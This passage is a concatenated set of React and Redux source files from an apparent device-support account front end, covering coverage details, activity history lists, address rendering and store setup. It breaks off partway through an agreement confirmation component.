refs/heads/master | <repo_name>dheerajui/React<file_sep>/src/components/CoverageItem/CoverageItem.js
import React from 'react';
import PropTypes from 'prop-types';
import { injectIntl, intlShape } from 'react-intl';
import { formatString } from '../../services/utilities';
import { metrics, EXIT_EVENT } from '../../metrics/AnalyticsService';
import ExtendCoverageButton from '../ExtendCoverageButton';
import { coverageItem as messages } from '../../messages/messages';
import './CoverageItem.scss';
const VIEW_POC_URL = '/agreements/epoc/view/';
const SN_PLACEHOLDER = '?sn={0}';
const TRACK_MORE_PH = 'track_more';
const TRACK_LEARN_PH = 'track_learn';
const STATUS_ICON = {
green: 'icon icon-checksolid green ',
yellow: 'icon icon-exclamationsolid yellow',
blue: 'icon icon-exclamationsolid blue'
};
/**
* Coverage Section to be displayed on the Product Details page.
* @param {Object} intl - intl object provided by react-intl injectIntl
* @param {Object} coverageData - Object containing the data relevant to the current section
* @param {Function} [onViewPOCClick] - Handler for when user clicks to view their POC
* @param {Object} userData - Object containing the current user data
* @param {string} exitEvent
* @param {Function} [onExtendCoverageClick] - Handler for when user clicks to extend coverage on their device
* @param {Object} [device] - Object containing data on the current device
* @param {number} [deviceIndex] - Number representing the index in the device list of the current device
* @param {string} [agreementsUrl] - Url to deep dive for agreements registration
* @param {func} [onPurchaseAgreementClick] - Handler for clicking to purchase an agreement
* @returns {XML}
* @constructor
*/
const CoverageItem = ({ intl, coverageData, onViewPOCClick, userData, exitEvent,
onExtendCoverageClick, device, deviceIndex, agreementsUrl, onPurchaseAgreementClick }) => {
const {
// Common among all sections
title,
description,
status,
// agreementsEligibility
type,
extendLabel,
eligibilityType,
eligibilityRedirectUrl,
// coverageSummary
agreementCode,
agreementNumber,
viewPocLabel,
// supportCoverage and repairCoverage
endDate,
redirectUrlText,
redirectUrl
} = coverageData;
const is2FA = userData && userData.is2FA;
const actionLink = () => {
// Render view POC
if (viewPocLabel && agreementCode) {
if (is2FA) {
return (
<div className='coverage-actions'>
<form action={VIEW_POC_URL} method='post' target='_blank'>
<input type='hidden' name='agreementCode' value={agreementCode} />
<input type='hidden' name='serialNumberKey' value={device.serialNumberKey} />
<button
type='submit'
className='icon icon-after icon-chevronright section-button'
data-metrics-event-name={EXIT_EVENT}
data-metrics-event-value={'Product_Details::Exit_to_2Fac_Coverage_Modal_View'}
>
{viewPocLabel}
</button>
</form>
</div>
);
}
return (
<div className='coverage-actions'>
<button
className='view-poc'
onClick={e => {
if (onViewPOCClick) {
e.preventDefault();
metrics.trackEvent({
page: {
content_subtype: 'Product_Details::Coverage_Modal_View'
}
});
onViewPOCClick(agreementCode);
}
}}
>
{viewPocLabel}
</button>
</div>
);
// Render extend coverage button
} else if (extendLabel) {
return (
<div className='coverage-actions'>
<ExtendCoverageButton
onOpenModalClick={onExtendCoverageClick}
deviceInfo={device}
deviceIndex={deviceIndex}
eligibility={{ type, extendLabel, eligibilityType, eligibilityRedirectUrl }}
agreementsUrl={agreementsUrl}
onPurchaseAgreementClick={onPurchaseAgreementClick}
/>
</div>
);
// Render button specific to the section
} else if (redirectUrlText) {
return (
<div className='coverage-actions'>
<a
href={redirectUrl}
target='_blank'
data-metrics-event-name={EXIT_EVENT}
data-metrics-event-value={exitEvent || 'exit to cas'}
className='icon icon-after icon-chevronright section-button'
>
{redirectUrlText}
</a>
</div>
);
}
return null;
};
// Return any text that would appear above the description. Usually expiration or agreement number
const detailsText = () => {
if (agreementNumber) {
return (
<div className='coverage-details-text'>
{intl.formatMessage(messages.agreementNumber)}: {agreementNumber}
</div>
);
}
return null;
};
const dateOptions = {
year: 'numeric',
month: 'long',
day: 'numeric'
};
const descriptionReplaced = () => {
const updatedDescription = (description &&
(description.includes(TRACK_MORE_PH) || description.includes(TRACK_LEARN_PH)))
? formatString(description, {
[TRACK_LEARN_PH]: 'Product_Details::Exit_to_Learn_Product_Coverage',
[TRACK_MORE_PH]: 'Product_Details::Exit_to_More_About_AC'
})
: description;
if (endDate) {
return formatString(updatedDescription, {
0: intl.formatDate(new Date(endDate), dateOptions)
});
} else if (updatedDescription && updatedDescription.includes(SN_PLACEHOLDER)) {
return is2FA
? formatString(updatedDescription, {
0: device.maskedSerialNumber
})
: updatedDescription.replace(SN_PLACEHOLDER, '');
}
return updatedDescription;
};
return (
<div className='coverage-item'>
<span className={`coverage-icon ${STATUS_ICON[status]}`} />
<div className='coverage-details'>
<div className='coverage-subheader'>
<h3>{title}</h3>
</div>
<div className='coverage-details-wrapper'>
{detailsText()}
<div className='coverage-description' dangerouslySetInnerHTML={{ __html: descriptionReplaced() }} />
</div>
{actionLink()}
</div>
</div>
);
};
CoverageItem.propTypes = {
intl: intlShape.isRequired,
coverageData: PropTypes.object.isRequired,
onViewPOCClick: PropTypes.func,
onExtendCoverageClick: PropTypes.func,
userData: PropTypes.object.isRequired,
device: PropTypes.object,
deviceIndex: PropTypes.number,
agreementsUrl: PropTypes.string,
exitEvent: PropTypes.string,
onPurchaseAgreementClick: PropTypes.func
};
CoverageItem.defaultProps = {
onViewPOCClick: undefined,
onExtendCoverageClick: undefined,
device: {},
deviceIndex: 0,
agreementsUrl: '',
exitEvent: '',
onPurchaseAgreementClick: undefined
};
export default injectIntl(CoverageItem);
<file_sep>/src/components/CoverageList/__stories__/CoverageList.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import CoverageList from '../CoverageList';
const coverageList = {
device: {
browserClientImage: 'https://km.support.apple.com/kb/securedImage.jsp?configcode=GRY5',
color: 'c8caca',
currentDevice: false,
deviceClass: 'iPhone',
deviceNotSupported: false,
eligibleProductId: '100099',
enclosureColor: 'e5bdb5',
images: Array(3),
maskedSerialNumber: '•••••••0GRY5',
model: 'iPhone8,1',
modelName: 'iPhone 6s',
nickName: '<NAME>',
prettyProductName: 'iPhone 6s',
prodFamilyClassId: 'PFC3001',
prodFamilyClassName: 'iPhone',
prodGroupFamilyId: 'PGF31005',
prodGroupFamilyName: 'iPhone 6',
productName: 'IPHONE 6S',
serialNumberKey: '<KEY>',
superGroupId: 'SG003',
superGroupName: 'iPhone'
},
coverageData: {
currentlyFetching: 0,
isFetching: false,
didInvalidate: false,
coverage: ['NONE'],
data: {
notificationItem: false,
coverageInfo: {},
purchaseDateInfo: {
purchaseDate: '2016-02-19',
title: 'Valid Purchase Date',
description: 'KEYNAME[cc.registered.UNKNOWN_PRODUCT][ContentTBD]',
status: 'green'
},
agreementsEligibility: {},
supportCoverage: {
covered: false,
coveredBy: 'NONE',
expiryMessage: 'Estimated Expiration Date: {0}',
title: 'Telephone Technical Support: Expired',
description: 'KEYNAME[cc.support.SG003.NOPS_PPI][ContentTBD]',
status: 'yellow',
redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
redirectUrlText: 'Contact Apple Support'
},
repairCoverage: {
covered: false,
coveredBy: 'NONE',
endDate: '2017-02-18',
expiryMessage: 'Estimated Expiration Date: {0}',
title: 'Repairs and Service Coverage: Expired',
description: 'KEYNAME[cc.repair.SG003.OO][ContentTBD]',
status: 'yellow',
redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
redirectUrlText: 'Set up a repair'
}
}
},
userData: {
email: '<EMAIL>',
firstName: 'Test',
is2FA: false,
lastName: 'User'
}
};
storiesOf('Coverage List', module)
.add('Coverage List Items', () => (
<CoverageList
coverage={coverageList.coverageData}
userData={coverageList.userData}
device={coverageList.device}
/>
));
<file_sep>/src/routes/ShippingLabel/containers/ShippingLabelContainer.js
import { connect } from 'react-redux';
import { shippingLabelDataLoaded, trackPageView } from '../../../modules/shippinglabel';
import ShippingLabel from '../components/ShippingLabel';
const mapDispatchToProps = dispatch => ({
onDataLoaded: data => { dispatch(shippingLabelDataLoaded(data)); },
trackPageView: () => { trackPageView(); }
});
const mapStateToProps = state => ({
barcodeData: state.shippingLabelData.barcodeData,
dispatchId: state.shippingLabelData.dispatchId,
shippingAddress: state.shippingLabelData.shippingAddress,
returnAddress: state.shippingLabelData.returnAddress
});
export default connect(mapStateToProps, mapDispatchToProps)(ShippingLabel);
<file_sep>/src/components/Address/__stories__/Address.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import Address from '../Address';
import ADDRESS_DATA from '../../../__mock__/shipping-label.json';
storiesOf('Address', module)
.add('With full address data', () => (
<Address {...ADDRESS_DATA.shippingAddress} />
))
.add('With no country field', () => (
<Address {...{
address1: '30 Pearson St',
address2: 'APT#301',
city: 'Charlestown',
state: 'NSW',
postalCode: '2290'
}}
/>
))
.add('With emptry street2 field', () => (
<Address {...{
streetAddress: '30 Pearson St',
streetAddress2: '',
city: 'Charlestown',
state: 'NSW',
postalCode: '2290',
country: 'Australia'
}}
/>
))
.add('With no address data', () => (
<Address />
));
<file_sep>/src/components/CoverageItem/index.js
import CoverageItem from './CoverageItem';
export default CoverageItem;
<file_sep>/src/store/createStore.js
import { applyMiddleware, compose, createStore } from 'redux';
import thunk from 'redux-thunk';
import { browserHistory } from 'react-router';
import metricsMiddleware from '../metrics/MetricsMiddleware';
import makeRootReducer from './reducers';
import { updateLocation } from './location';
import { fetchCsrfToken } from './csrf';
export default (initialState = {}) => {
// ======================================================
// Middleware Configuration
// ======================================================
const middleware = [thunk, metricsMiddleware];
// ======================================================
// Store Enhancers
// ======================================================
const enhancers = [];
if (__DEV__) {
const devToolsExtension = window.devToolsExtension;
if (typeof devToolsExtension === 'function') {
enhancers.push(devToolsExtension());
}
}
// ======================================================
// Store Instantiation and HMR Setup
// ======================================================
const store = createStore(
makeRootReducer(),
initialState,
compose(
applyMiddleware(...middleware),
...enhancers
)
);
store.asyncReducers = {};
// To unsubscribe, invoke `store.unsubscribeHistory()` anytime
store.unsubscribeHistory = browserHistory.listen(nextLocation => {
updateLocation(store)(nextLocation);
fetchCsrfToken()(store.dispatch);
});
if (module.hot) {
module.hot.accept('./reducers', () => {
const reducers = require('./reducers').default; // eslint-disable-line global-require
store.replaceReducer(reducers(store.asyncReducers));
});
}
return store;
};
<file_sep>/src/routes/AllHistory/components/AllHistory.js
import PropTypes from 'prop-types';
import React from 'react';
import { metrics } from '../../../metrics/AnalyticsService';
import Divider from '../../../components/Divider';
import AllActivityList from '../../../components/ActivityList/AllActivityList';
import NeedMoreHelp from '../../../components/NeedMoreHelp';
import PageTitle from '../../../components/PageTitle';
import NavigationLink from '../../../components/NavigationLink';
import RepairLookupSection from '../../../components/RepairLookupSection';
import { allHistory as messages } from '../../../messages/messages';
import './AllHistory.scss';
/**
* Component that lists all the activities
* @param {Object} activityData
* @param {Function} onActivityListMount
* @param {Function} onNextPageClick
* @param {Function} onLookupFormSubmit
* @return {XML}
* @class
*/
class AllHistory extends React.Component {
componentDidMount() {
metrics.trackPage({
page: {
content_subtype: 'History::Main'
}
});
}
render() {
const { activityData, onActivityListMount, onNextPageClick, onLookupFormSubmit } = this.props;
return (
<div className='all-history-page'>
<div className='heading content-area'>
<PageTitle title={{ ...messages.pageTitle, tagName: 'h1' }} />
<NavigationLink />
</div>
<section className='all-activities content-area narrow-content'>
<AllActivityList
activityData={activityData}
onMount={onActivityListMount}
onNextPageClick={onNextPageClick}
/>
</section>
<Divider />
<section className='lookup content-area'>
<RepairLookupSection onLookupFormSubmit={onLookupFormSubmit} />
</section>
<Divider />
<section className='content-area'>
<NeedMoreHelp />
</section>
</div>
);
}
}
AllHistory.propTypes = {
activityData: PropTypes.object.isRequired,
onNextPageClick: PropTypes.func.isRequired,
onActivityListMount: PropTypes.func.isRequired,
onLookupFormSubmit: PropTypes.func.isRequired
};
export default AllHistory;
<file_sep>/src/main.js
/* eslint-disable global-require, import/no-dynamic-require */
import React from 'react';
import ReactDOM from 'react-dom';
import { addLocaleData } from 'react-intl';
import { getValue } from './services/object';
import createStore from './store/createStore';
import AppContainer from './containers/AppContainer';
import updateMessages, { fetchingTranslations } from './store/intl';
import { fetchOmnitureProps } from './metrics/AnalyticsService';
import config from './services/intlConfig';
import 'babel-polyfill'; // eslint-disable-line import/first, Must be loaded after React and ReactDOM for use with IE
require('es6-promise').polyfill();
// ========================================================
// Initial state construction
// ========================================================
// Get the locale information from initial state, and update it as necessary
const windowState = getValue('___INITIAL_STATE__', window, {});
const language = getValue('page.locale.languageCode', windowState, 'en');
const countryCode = getValue('page.locale.countryCode', windowState, 'US');
const mappedLanguage = config.unsupportedLocales[`${language}-${countryCode}`];
const languageToLoad = mappedLanguage || language;
const initialState = Object.assign({}, windowState,
{
intl: Object.assign({}, windowState.intl, { locale: `${languageToLoad}-${countryCode}` })
}
);
// ========================================================
// Store Instantiation
// ========================================================
const store = createStore(initialState);
const locale = getValue('intl.locale', initialState, 'en-US');
const backendLocale = `${language}_${countryCode}`;
// request translations
const deviceWidth = window.innerWidth;
// Split localization data into its own package, with individual files for each language. Load locale data and then
// make API call for translations
store.dispatch(fetchingTranslations(true));
import(/* webpackChunkName: "i18n/[request]" */ `react-intl/locale-data/${languageToLoad}`)
.then(localeData => {
addLocaleData([...localeData]);
store.dispatch(updateMessages({
serviceEndpoint: config.intl.endpoint,
pageName: getValue('page.name', initialState),
locale,
backendLocale,
deviceType: deviceWidth <= 735 ? 'mobile' : 'desktop'
}));
})
.catch(() => {
console.error('Unable to load language data. Defaulting to English.');
store.dispatch(updateMessages({
serviceEndpoint: config.intl.endpoint,
pageName: getValue('page.name', initialState),
locale: 'en', // Default locale to 'en' if the locale data loading failed
backendLocale,
deviceType: deviceWidth <= 735 ? 'mobile' : 'desktop'
}));
});
// Load omniture properties
fetchOmnitureProps(backendLocale);
// ========================================================
// Render Setup
// ========================================================
const MOUNT_NODE = document.getElementById('root');
const renderApp = () => {
const routes = require('./routes/index').default(store);
ReactDOM.render(
<AppContainer routes={routes} store={store} />,
MOUNT_NODE
);
};
const render = () => {
if (__DEV__) {
if (module.hot) {
const renderError = error => {
const RedBox = require('redbox-react').default;
ReactDOM.render(<RedBox error={error} />, MOUNT_NODE);
};
// Wrap render in try/catch
try {
renderApp();
} catch (error) {
renderError(error);
}
}
} else {
renderApp();
}
};
// ========================================================
// Developer Tools Setup
// ========================================================
// This code is excluded from production bundle
if (__DEV__) {
if (module.hot) {
// Setup hot module replacement
module.hot.accept('./routes/index', () =>
setImmediate(() => {
ReactDOM.unmountComponentAtNode(MOUNT_NODE);
render();
})
);
}
}
/*eslint-disable*/
if (!__PROD__) {
const originalConsoleError = console.error;
if (console.error === originalConsoleError) {
console.error = (...args) => {
if (args[0].indexOf('[React Intl] Missing message:') === 0) {
return;
}
originalConsoleError.call(console, ...args);
}
}
}
/*eslint-enable*/
// ========================================================
// Go!
// ========================================================
// But first make sure that we polyfill Intl if needed
if (!global.Intl) {
require.ensure([
'intl'
], require => {
require('intl');
render();
}, 'intl-polyfill');
} else {
render();
}
<file_sep>/src/components/Address/Address.js
import React from 'react';
import PropTypes from 'prop-types';
import './Address.scss';
/**
* Renders the user's address based on all available information
* @param {string} [firstName]
* @param {string} [lastName]
* @param {string} [orgName]
* @param {string} [address1]
* @param {string} [address2]
* @param {string} [city]
* @param {string} [state]
* @param {string} [postal]
* @param {string} [country]
* @returns {XML}
* @constructor
*/
const Address = ({ firstName, lastName, orgName, address1, address2, city, state, postal, country }) => {
const getAddressField = (field, props) => (field ? <div {...props}>{field}</div> : '');
return (
<div className='address'>
{ getAddressField(firstName, { className: 'first-name' }) }
{ getAddressField(lastName, { className: 'last-name' }) }
{ getAddressField(orgName, { className: 'org-name' }) }
{ getAddressField(address1, { className: 'street-address' }) }
{ getAddressField(address2, { className: 'street-address' }) }
{ getAddressField(city, { className: 'city' }) }
{ getAddressField(state, { className: 'state' }) }
{ getAddressField(postal, { className: 'postal-code' }) }
{ getAddressField(country, { className: 'country' }) }
</div>
);
};
Address.propTypes = {
firstName: PropTypes.string,
lastName: PropTypes.string,
orgName: PropTypes.string,
address1: PropTypes.string,
address2: PropTypes.string,
city: PropTypes.string,
state: PropTypes.string,
postal: PropTypes.string,
country: PropTypes.string
};
Address.defaultProps = {
firstName: '',
lastName: '',
orgName: '',
address1: '',
address2: '',
city: '',
state: '',
postal: '',
country: ''
};
export default Address;
<file_sep>/src/components/CoverageItem/__stories__/CoverageItem.js
import React from 'react';
import { storiesOf } from '@storybook/react';
import CoverageItem from '../CoverageItem';
const coverage = [
{
description: 'Eligible for an AppleCare product',
purchaseDate: '2016-02-19',
status: '',
title: 'Valid Purchase Date'
},
{
covered: false,
coveredBy: 'NONE',
description: 'Telephone Technical Support: Active',
expiryMessage: 'Estimated Expiration Date: {0}',
redirectUrl: 'https://getsupport-uatb.apple.com?sn=590a441abb2fe5a082f05625&locale=en_US',
redirectUrlText: 'Contact Apple Support',
status: 'yellow',
title: 'Telephone Technical Support: Expired'
}
];
storiesOf('Coverage Item', module)
.add('With Warning icon', () => (
<CoverageItem coverageData={coverage[1]} />
))
.add('Without any status icon', () => (
<CoverageItem coverageData={coverage[0]} />
));
<file_sep>/src/components/ActivityList/AllActivityList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage } from 'react-intl';
import { metrics } from '../../metrics/AnalyticsService';
import ActivityItem from '../ActivityItem';
import { focusElement } from '../../services/utilities';
import { allActivityList as messages } from '../../messages/messages';
import './ActivityList.scss';
/**
* Id prefix for selecting for accessibility
* @type {string}
* @constant
* @memberOf ActivityList
*/
const ITEM_ID_PREFIX = 'activity-item-';
/**
* Handles rendering of all the user's available activity. Includes pagination.
* @param {Object} activityData - Object containing activity data from redux store
* @param {Function} onNextPageClick - Handler for loading more activity
* @param {Function} onMount - Function to be called when the component is first mounted
* @class
*/
class AllActivityList extends React.Component {
componentDidMount() {
this.props.onMount();
}
componentDidUpdate() {
if (this.props.activityData.fetchingMore) return;
const newItem = document.querySelector(`#${ITEM_ID_PREFIX}${this.props.activityData.prevNumOfCases} h2`);
if (!newItem) return;
window.setTimeout(() => {
focusElement(newItem);
}, 100);
}
getShowMoreButton(moreRecords, onNextPageClick, fetchingMore) {
if (fetchingMore) {
// show a spinner
return <div className='fetching-more loading' />;
} else if (moreRecords) {
// Show more button
return this.seeMoreElement(onNextPageClick, messages.seeMore);
}
// Don't show a button at all
return <div className='empty-area' />;
}
getActivityListContent() {
const { activityData, onNextPageClick } = this.props;
const isFetching = activityData.isFetching;
const fetchingMore = activityData.fetchingMore;
const activityList = activityData.cases;
if (isFetching) {
return <div className='loading' />;
}
if (activityList && activityList.length) {
const bookmark = activityData.bookmark;
const moreRecords = activityData.moreRecords;
return (
<div className='activity-list'>
{this.allActivityList(activityList)}
{this.getShowMoreButton(moreRecords, () => { onNextPageClick(bookmark); }, fetchingMore)}
</div>
);
}
return (
<div className='activity-list'>
<div className='no-history'><FormattedMessage {...messages.noData} /></div>
</div>
);
}
allActivityList(activityList) {
return (
<div className='activity-wrapper'>
{activityList.map((activityData, i) => (
<ActivityItem
activityData={activityData}
key={activityData.caseId}
id={ITEM_ID_PREFIX + i}
allActivities
/>
))}
</div>
);
}
seeMoreElement(handler, message) {
return (
<div className='see-more-link'>
<button
aria-expanded='false'
aria-controls='activity-list'
onClick={() => {
metrics.trackEvent({
page: {
content_subtype: 'Expand::History History Page'
}
});
handler();
}}
>
<FormattedMessage {...message} />
</button>
</div>
);
}
render() {
return this.getActivityListContent();
}
}
AllActivityList.propTypes = {
activityData: PropTypes.object.isRequired,
onNextPageClick: PropTypes.func.isRequired,
onMount: PropTypes.func.isRequired
};
export default AllActivityList;
<file_sep>/src/modules/activities.js
/**
* Redux actions and handlers related to activity and case data
* @module activities
*/
import fetchService from '../services/fetchService';
import { getNotificationItems } from '../services/notificationService';
import { serverErrorMessage } from '../messages/messages';
import { actions as modalActions } from '../modules/errorsmodal';
/**
* Constants
*/
export const REQUEST_ACTIVITIES = 'REQUEST_ACTIVITIES';
export const REQUEST_MORE_ACTIVITIES = 'REQUEST_MORE_ACTIVITIES';
export const RECEIVE_ACTIVITIES = 'RECEIVE_ACTIVITIES';
export const SEE_MORE_NOTIFICATIONS = 'SEE_MORE_NOTIFICATIONS';
export const RESET_NOTIFICATIONS = 'RESET_NOTIFICATIONS';
export const SEE_MORE_ACTIVITY = 'SEE_MORE_ACTIVITY';
const ACTIVITY_API_URL = __PROD__
? '/api/v1/supportaccount/activity/history'
: `http://${__JSON_HOST__}:3004/mycases`;
const FETCH_ERROR_DATA = {
error: true
};
/**
* Actions
*/
/**
* action requestActivities
* @return {Object} action
*/
const requestActivities = () => ({
type: REQUEST_ACTIVITIES
});
/**
* action requestMoreActivities
* @return {Object} action
*/
const requestMoreActivities = () => ({
type: REQUEST_MORE_ACTIVITIES
});
/**
* action receiveActivities
* @param {Object} payload Activity data returned from server
* @param {Boolean} append
* @return {Object} action
*/
const receiveActivities = (payload, append) => ({
type: RECEIVE_ACTIVITIES,
payload,
append
});
/**
* action seeMoreActivityClicked
* @param {Boolean} showMore Whether to show more items or not
* @return {Object} action
*/
const seeMoreActivityClicked = (showMore = true) => ({
type: SEE_MORE_ACTIVITY,
showMore
});
/**
* action seeMoreActivityClicked
* @param {Boolean} showMore Whether to show more items or not
* @return {Object} action
*/
const seeMoreNotificationsClicked = (showMore = true) => ({
type: SEE_MORE_NOTIFICATIONS,
showMore
});
/**
* action resetNotifications
* @return {Object} action
*/
const resetNotifications = () => ({
type: RESET_NOTIFICATIONS
});
/**
* All Actions
* @type {Object}
*/
export const actions = {
seeMoreActivityClicked,
seeMoreNotificationsClicked,
requestActivities,
requestMoreActivities,
receiveActivities,
resetNotifications
};
/**
* prepare activity data
* @param {Object} data
* @return {Object} modified data
*/
const _prepareData = data => (
{
cases: data.cases,
notifications: getNotificationItems(data.cases),
bookmark: data.bookmark,
moreRecords: data.moreRecords
}
);
/**
* Fetch data and dispatch action
* @return {Function} dispatch
*/
export const fetchAllActivities = (serialNumberKey = '') => dispatch => {
dispatch(requestActivities());
const apiUrl = serialNumberKey
? (`${ACTIVITY_API_URL}?serialNumberKey=${serialNumberKey}`)
: ACTIVITY_API_URL;
return fetchService(apiUrl, {})
.then(data => {
dispatch(receiveActivities(_prepareData(data), false));
})
.catch(
ex => {
console.error('Exception while fetching activities. ', ex);
dispatch(receiveActivities(FETCH_ERROR_DATA, false));
}
);
};
/**
* Fetch data and dispatch action
* @return {Function} dispatch
*/
export const fetchMoreActivities = (bookmark = '', serialNumberKey = '') => {
const tempUrl = bookmark ? (`${ACTIVITY_API_URL}?bookmark=${bookmark}`) : ACTIVITY_API_URL;
const apiUrl = serialNumberKey
? (`${tempUrl + (bookmark ? '&' : '?')}serialNumberKey=${serialNumberKey}`)
: tempUrl;
return dispatch => {
dispatch(requestMoreActivities());
return fetchService(apiUrl, {})
.then(data => {
dispatch(receiveActivities(_prepareData(data), true));
})
.catch(
ex => {
console.error('Exception while fetching activities. ', ex);
dispatch(receiveActivities(Object.assign({}, FETCH_ERROR_DATA, {
bookmark,
moreRecords: true
}), true));
dispatch(modalActions.showModal(serverErrorMessage));
}
);
};
};
/**
* Action Handler for fetch request
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const requestActivitiesHandler = (state = {}, action) => {
if (action.type !== REQUEST_ACTIVITIES) {
return state;
}
return Object.assign({}, state, {
isFetching: true
});
};
/**
* Action Handler for fetch request
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const requestMoreActivitiesHandler = (state = {}, action) => {
if (action.type !== REQUEST_MORE_ACTIVITIES) {
return state;
}
return Object.assign({}, state, {
fetchingMore: true
});
};
/**
* Action Handler for fetch response
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const receiveActivitiesHandler = (state = {}, action) => {
if (action.type !== RECEIVE_ACTIVITIES) {
return state;
}
const { error, bookmark, moreRecords } = action.payload;
const prevNumOfCases = (state.cases || []).length;
const notifications = action.payload.notifications // eslint-disable-line no-nested-ternary
? (action.append
? (state.notifications || []).concat(action.payload.notifications)
: action.payload.notifications)
: state.notifications;
const cases = action.payload.cases // eslint-disable-line no-nested-ternary
? (action.append
? (state.cases || []).concat(action.payload.cases)
: action.payload.cases)
: state.cases;
return Object.assign({}, state, {
isFetching: false,
fetchingMore: false,
fetchComplete: true,
cases,
error,
notifications,
bookmark,
moreRecords,
prevNumOfCases
});
};
/**
* Action Handler for resetting notifications
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const resetNotificationsHandler = (state = {}, action) => {
if (action.type !== RESET_NOTIFICATIONS) {
return state;
}
return Object.assign({}, state, {
notifications: []
});
};
/**
* Action handler for 'See More Activity' link
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const seeMoreActivityHandler = (state = {}, action) => {
if (action.type !== SEE_MORE_ACTIVITY) {
return state;
}
const activityData = Object.assign({}, state.activityData, {
showMoreActivities: action.showMore
});
return Object.assign({}, state, activityData);
};
/**
* Action handler for 'See More Activity' link
* @param {Object} state
* @param {Object} action
* @return {Object} new state
*/
const seeMoreNotificationsHandler = (state = {}, action) => {
if (action.type !== SEE_MORE_NOTIFICATIONS) {
return state;
}
const activityData = Object.assign({}, state.activityData, {
showMoreNotifications: action.showMore
});
return Object.assign({}, state, activityData);
};
/**
* All Action Handlers
* @type {Object}
*/
const ACTION_HANDLERS = {
[REQUEST_ACTIVITIES]: requestActivitiesHandler,
[REQUEST_MORE_ACTIVITIES]: requestMoreActivitiesHandler,
[RECEIVE_ACTIVITIES]: receiveActivitiesHandler,
[SEE_MORE_ACTIVITY]: seeMoreActivityHandler,
[SEE_MORE_NOTIFICATIONS]: seeMoreNotificationsHandler,
[RESET_NOTIFICATIONS]: resetNotificationsHandler
};
/**
* Reducers
*/
export const initialState = {
fetchComplete: false,
showMoreActivities: false,
showMoreNotifications: false,
cases: [],
error: false,
notifications: [],
bookmark: 0,
moreRecords: false
};
const reducer = (state = initialState, action) => {
const handler = ACTION_HANDLERS[action.type];
return handler ? handler(state, action) : state;
};
export default reducer;
<file_sep>/src/components/ActivityList/ActivityList.js
import React from 'react';
import PropTypes from 'prop-types';
import { FormattedMessage } from 'react-intl';
import { metrics } from '../../metrics/AnalyticsService';
import ActivityItem from '../ActivityItem';
import { focusElement } from '../../services/utilities';
import { activityList as messages } from '../../messages/messages';
import './ActivityList.scss';
/**
* Initial items to show on render
* @type {number}
* @constant
* @memberOf ActivityList
*/
const MIN_ITEMS = 3;
/**
* Id prefix for selecting for accessibility
* @type {string}
* @constant
* @memberOf ActivityList
*/
const ITEM_ID_PREFIX = 'activity-item-';
/**
* Shows a list of activities with options to expand if total number is fewer than maxItemsToShow
* @param {Object} activities - Object containing activity data from redux store
* @param {Function} onShowMoreClick - Handler for clicking the button to expand the list
* @param {number} maxItemsToShow - Maximum items to show at a time
* @returns {XML}
* @constructor
*/
const ActivityList = ({ activities, onShowMoreClick, maxItemsToShow }) => {
if (activities.isFetching) {
return <div className='loading' />;
}
if (activities.error) {
return (<div className='activity-error'><FormattedMessage {...messages.fetchError} /></div>);
}
const showMore = activities.showMoreActivities;
const activityList = activities.cases;
const hasMoreRecords = activities.moreRecords;
const itemCount = activityList.length;
// Button text to show more or show less devices
const showMoreElement = () => {
if (showMore) {
return <FormattedMessage {...messages.seeLess} />;
} else if (hasMoreRecords || (itemCount > maxItemsToShow)) {
return <FormattedMessage {...messages.seeAll} />;
}
return <FormattedMessage {...messages.showAll} />;
};
const manageFocus = () => {
// a11y: programmatically move the focus to the first of newly loaded activity
// use timeout of 100ms for VO to correctly get the focus and
// also allow time for activities to load
window.setTimeout(() => {
const newItem = document.querySelector(`#${ITEM_ID_PREFIX}${MIN_ITEMS} h3`);
focusElement(newItem);
}, 100);
};
const showMoreLink = () => {
const linkIconClass = showMore ? 'icon-resetcircle' : 'icon-pluscircle';
if (activityList.length <= MIN_ITEMS && !hasMoreRecords) {
return <div className='empty-area' />;
} else if (hasMoreRecords || itemCount > maxItemsToShow) {
return (
<div className='see-more-link'>
<a href='/activity' className='icon icon-after icon-chevronright'>
{showMoreElement(itemCount, showMore)}
</a>
</div>
);
}
return (
<div className='see-more-link'>
<button
aria-expanded={showMore}
className={`icon icon-after ${linkIconClass}`}
onClick={e => {
metrics.trackEvent({
page: {
content_subtype: 'Expand::History Landing Page'
}
});
e.preventDefault();
onShowMoreClick(!showMore);
if (!showMore) {
manageFocus();
}
}}
>
{showMoreElement()}
</button>
</div>
);
};
if (activityList && activityList.length) {
const visibleItems = activityList.slice(0, showMore ? maxItemsToShow : MIN_ITEMS);
return (
<div className='activity-wrapper'>
<div className='activity-list'>
{visibleItems.map((activityData, i) => (
<ActivityItem
activityData={activityData}
key={activityData.caseId}
id={ITEM_ID_PREFIX + i}
className={(!showMore && i >= MIN_ITEMS) ? 'hide' : ''}
/>
))}
</div>
{showMoreLink()}
</div>
);
}
return (<div className='no-history'><FormattedMessage {...messages.noData} /></div>);
};
ActivityList.propTypes = {
activities: PropTypes.object.isRequired,
onShowMoreClick: PropTypes.func,
maxItemsToShow: PropTypes.number.isRequired
};
ActivityList.defaultProps = {
onShowMoreClick: undefined
};
export default ActivityList;
<file_sep>/src/components/ActivityItem/index.js
import ActivityItem from './ActivityItem';
export default ActivityItem;
<file_sep>/src/components/AgreementConfirmation/AgreementConfirmation.js
import React from 'react';
import CSSTransitionGroup from 'react-transition-group/CSSTransitionGroup';
import AppleCareImage from '../AppleCareImage';
import PageTitle from '../PageTitle';
import NavigationLink from '../NavigationLink';
import { agreementConfirmation as messages } from '../../messages/messages';
import './AgreementConfirmation.scss';
/**
* Confirmation page for once a user has registered an agreement. It will be displayed on the same route
* as the registration form itself after submission and validation.
* @returns {XML}
* @constructor
*/
const AgreementConfirmation = () => {
const appleCareImageSize = 90;
return (
<CSSTransitionGroup
transitionName='component-mount'
transitionAppear
transitionAppearTimeout={400}
transitionEnter={false}
transitionLeave={false}
component='div'
className='agreement-confirmation'
>
<div className='applecare-container'>
